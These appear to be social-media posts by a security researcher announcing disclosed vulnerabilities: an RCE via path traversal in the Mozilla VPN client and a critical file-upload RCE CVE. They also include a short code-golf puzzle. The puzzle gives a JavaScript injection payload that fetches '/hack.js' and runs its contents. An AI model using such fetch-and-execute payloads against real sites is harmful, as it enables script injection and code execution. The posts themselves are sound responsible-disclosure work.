Just had my #bugbounty report disclosed on
#HackerOne ๐ช
TL;DR
RCE via path traversal in the Mozilla VPN Client through the local websocket server (developer mode).
hackerone.com/reports/2995...
Fun challenge! The following would work in a script of type module (N/A here, but still interesting - 40 char):
run(await(await fetch`/hack.js`).text())
As we have a regular script tag, the payload needs to be inside an async function (53 char):
(async()=>run(await(await fetch`/hack.js`).text()))()
CVE-2024-8856 is out! This is my 7th CVE, but my first critical one.
TL;DR
Unauthenticated RCE via Arbitrary File Upload (thanks to some very questionable file type validation).
Already posted on X, but wanted something on my profile... ๐
#BugBounty #Security
Write-up:
hacked.be/posts/CVE-20...
